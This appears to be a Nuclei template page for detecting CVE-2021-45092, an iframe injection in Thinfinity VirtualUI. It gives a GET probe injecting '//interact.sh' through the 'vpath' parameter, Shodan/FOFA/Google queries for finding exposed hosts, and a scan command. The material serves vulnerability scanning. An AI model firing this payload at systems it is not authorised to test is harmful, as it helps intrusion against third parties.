Skip to content
Nuclei Templates

Thinfinity Iframe Injection

ID: CVE-2021-45092

Severity: critical

Author: danielmofer

Tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft

Description

Section titled “Description”

A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the “vpath” parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2021-45092


info:
  name: Thinfinity Iframe Injection
  author: danielmofer
  severity: critical
  description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default  could allow IFRAME injection via the "vpath" parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-45092
    - http://packetstormsecurity.com/files/166068/Thinfinity-VirtualUI-2.5.41.0-IFRAME-Injection.html
    - https://github.com/danielmofer/nuclei_templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45092
    cwe-id: CWE-74
    epss-score: 0.05776
    epss-percentile: 0.93361
    cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybelesoft
    product: thinfinity_virtualui
    shodan-query: http.title:"thinfinity virtualui"
    fofa-query: title="thinfinity virtualui"
    google-query: intitle:"thinfinity virtualui"
  tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft


http:
  - method: GET
    path:
      - "{{BaseURL}}/lab.html?vpath=//interact.sh"


    matchers:
      - type: regex
        regex:
          - ".*vpath.*"
          - "thinfinity"
        condition: and
# digest: 4a0a00473045022100e4d7b0d9ebaa479265cafb0b529c2a78289dbb94969aa1810ac28f3e37f6790e02207bdc46248a6713ca7627a04c45a71f60a47e542b833aec8c3f641ae62841556e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45092.yaml"

View on Github